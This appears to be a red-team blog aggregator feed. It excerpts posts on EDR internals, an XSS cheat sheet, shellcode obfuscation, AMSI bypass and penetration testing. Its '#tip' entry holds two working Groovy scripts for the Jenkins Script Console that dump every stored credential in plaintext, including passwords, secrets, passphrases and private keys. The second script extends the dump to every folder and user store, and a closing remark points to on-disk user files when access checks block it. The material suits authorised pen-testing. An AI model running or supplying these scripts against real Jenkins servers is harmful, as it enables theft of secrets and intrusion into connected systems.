RedTeam feed
RedTeam blogposts and articles collection
EDR Internals for macOS and Linux
#outflank

Many public blogs and conference talks have covered Windows telemetry sources like kernel callbacks and ETW, but few mention macOS and Linux equivalents. Although most security professionals may not be surprised by this lack of coverage, one should not overlook these platforms. For example, developers using macOS often have privileged cloud accounts or access to intellectual property like source code. Linux servers may host sensitive databases or customer-facing applications. Defenders must have confidence in their tools for these systems, and attackers must understand how to evade them. This post dives into endpoint security products on macOS and Linux to understand their capabilities and identify weaknesses.

Endpoint detection and response (EDR) agents comprise multiple sensors: components that collect events from one or more telemetry sources. The agent formats raw telemetry data into a standard format and then forwards it to a log aggregator.

via Outflank Blog (author: Kyle Avery)
Essential Steps for Management to Maximize the Value of a Penetration Test Report
#redsiege

by Tim Medin, CEO Penetration testing is a critical component of a well-rounded cybersecurity strategy. Pen testing identifies vulnerabilities before malicious actors can exploit them. However, the true value of […]

via RedSiege Blog (author: Red Siege)
Introducing The Shelf
#trustedsec

As an independent security consulting firm, we develop many custom capabilities over time. What happens when we decide that a capability no longer suits our needs to successfully execute tests for our customers?…

via TrustedSec Blog (author: Christopher Paschen)
WHFB and Entra ID : Say Hello to your new cache flow
#synacktiv

via Synacktiv Blog (author: Webmaster)
#tip

Found a script that extracts all secrets from Jenkins, not just the root scope, as most HackTricks-like notes offer.


import com.cloudbees.hudson.plugins.folder.Folder
import com.cloudbees.plugins.credentials.Credentials
import com.cloudbees.plugins.credentials.CredentialsProvider
import jenkins.model.Jenkins

// Credentials gathered from the root (system) scope and from every folder.
Set<Credentials> allCredentials = new HashSet<Credentials>()

// Root scope: the part most one-liners stop at.
allCredentials.addAll(CredentialsProvider.lookupCredentials(Credentials.class))

// Folder scope: each folder can carry its own credentials store. Only plain
// Folder items are walked here; other folder-like items (e.g. multibranch
// projects) are not.
Jenkins.instance.getAllItems(Folder.class).each { Folder f ->
    allCredentials.addAll(CredentialsProvider.lookupCredentials(Credentials.class, f))
}

// Print whatever secret-bearing getters each credential type exposes.
// hudson.util.Secret.toString() returns the plain text (and logs a warning),
// which is why the Secret-valued fields print in clear.
for (c in allCredentials) {
    println(c.id)
    if (c.properties.description) {
        println(" description: " + c.description)
    }
    if (c.properties.username) {
        println(" username: " + c.username)
    }
    if (c.properties.password) {
        println(" password: " + c.password)
    }
    if (c.properties.passphrase) {
        println(" passphrase: " + c.passphrase)
    }
    if (c.properties.secret) {
        println(" secret: " + c.secret)
    }
    if (c.properties.privateKeySource) {
        println(" privateKey: " + c.getPrivateKey())
    }
    println("")
}
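Added example (not the script from the post above, and not from any project): the per-Folder loop reaches root and plain-Folder credentials, but not the stores attached to other folder-like items (multibranch projects, organization folders) or the per-user stores. Walking every CredentialsStore through the Credentials plugin's store API covers all of those in one pass. It assumes the Credentials plugin API (CredentialsProvider.lookupStores, CredentialsStore.getDomains()/getCredentials(Domain)), the cloudbees-folder plugin for folder stores, and that the identity you run the Script Console as passes each store's own permission check.

```groovy
// Added example: enumerate every CredentialsStore Jenkins knows about
// (system, every ItemGroup, every user) rather than calling
// lookupCredentials() per Folder. Run from Manage Jenkins -> Script Console
// as an administrator. Assumes the Credentials plugin store API below.
import com.cloudbees.plugins.credentials.Credentials
import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.CredentialsStore
import com.cloudbees.plugins.credentials.domains.Domain
import hudson.model.Item
import hudson.model.ItemGroup
import hudson.model.ModelObject
import hudson.model.User
import hudson.util.Secret
import jenkins.model.Jenkins

// Unwrap a Secret explicitly; leave plain strings and nulls alone.
String plain(Object v) {
    v instanceof Secret ? v.plainText : String.valueOf(v)
}

// Pull the secret material out of whatever credential type this is, probing
// the same getter names as the post's script (username, password, secret,
// passphrase, privateKeySource).
String reveal(Credentials c) {
    def p = c.properties
    def parts = []
    if (p.username)         parts << "username=" + c.username
    if (p.password)         parts << "password=" + plain(c.password)
    if (p.secret)           parts << "secret=" + plain(c.secret)
    if (p.passphrase)       parts << "passphrase=" + plain(c.passphrase)
    if (p.privateKeySource) parts << "privateKey=\n" + c.privateKey
    return parts.join(' ')
}

// Contexts that can own a store: the root, every ItemGroup (folders of any
// kind, including multibranch and organization folders), and every user.
List<ModelObject> contexts = [Jenkins.instance]
contexts.addAll(Jenkins.instance.getAllItems(Item.class).findAll { it instanceof ItemGroup })
contexts.addAll(User.getAll())

// lookupStores() walks from the context up to the root, so a folder also
// yields the system store; keep only the store owned by this exact context
// so nothing is listed twice.
contexts.each { ModelObject ctx ->
    CredentialsProvider.lookupStores(ctx).each { CredentialsStore store ->
        if (!store.context.is(ctx)) {
            return
        }
        String where = store.context.displayName
        // Every domain in the store, not only the global one.
        store.domains.each { Domain d ->
            String domainName = d.global ? '(global)' : d.name
            store.getCredentials(d).each { Credentials c ->
                println("[" + where + "] domain=" + domainName + " id=" + c.id + " " + reveal(c))
            }
        }
    }
}
```

The store API enforces each store's ACL, so an empty result for a user store is the permission check talking, not proof that the user has no credentials; in that case the on-disk users/*/config.xml of that user is the place to look.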
Everything You Need to Know About jQuery and its Vulnerabilities
#trustedsec

IntroductionJavaScript is used in some way on almost all modern web applications. There are several popular libraries that websites utilize, and each come with their own pros and cons. Today, we will focus on one of the…

via TrustedSec Blog (author: Luke Bremer)
Hands On with Chip Off Non-Volatile Memory
#trustedsec

1.1 Introduction - Why We're HereWelcome to a deep dive into desoldering Non-Volatile storage chips! At the time of publishing, this is a recreation of my own first attempts at desoldering, and intended to encourage…

via TrustedSec Blog (author: Philip DuBois)
onwebkitplaybacktargetavailabilitychanged?! New exotic events in the XSS cheat sheet
#portswigger

The power of our XSS cheat sheet is we get fantastic contributions from the web security community and this update is no exception. We had valuable contributions from Mozilla to remove events that no

via PortSwigger Research
Tips and Tricks on Creating Your First Conference Talk
#trustedsec

Have you ever attended a security conference (or any conference for that matter) and thought about giving a presentation yourself, but don't know where to start? Well, I am here to help! This blog post will guide you…

via TrustedSec Blog (author: Whitney Phillips)
Nighthawk 0.3 – Automate All the Things
#mdsec

OpSec and evasion are two of the most important factors for red team success in modern day operations, and Nighthawk continues to lead the way in innovation on this front....

via MDSec Blog (author: Admin)
Adventures in Shellcode Obfuscation! Part 1: Overview
#redsiege

by Mike Saunders, Principal Security Consultant     This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate […]

via RedSiege Blog (author: Red Siege)
ScriptBlock Smuggling: Spoofing PowerShell Security Logs and Bypassing AMSI Without Reflection or Patching
#bcsecurity

Note: All code samples shown in the post can be found in our repo here  In recent years, PowerShell tradecraft has seen a drop in popularity among pentesters, red teams, and to some extent APTs. There are several reasons for this, but at the core, it was the introduction of [...]

via BC Security Blog (author: Hubbl3)
Let’s Clone a Cloner...To Meet My Needs
#trustedsec

It was my second Physical Penetration Test here at TrustedSec and I was paired with colleague Paul Burkeland. After arriving at the hotel, Paul stated that he needed 16 AA batteries, so we went to the local CVS. I was…

via TrustedSec Blog (author: Costa Petros)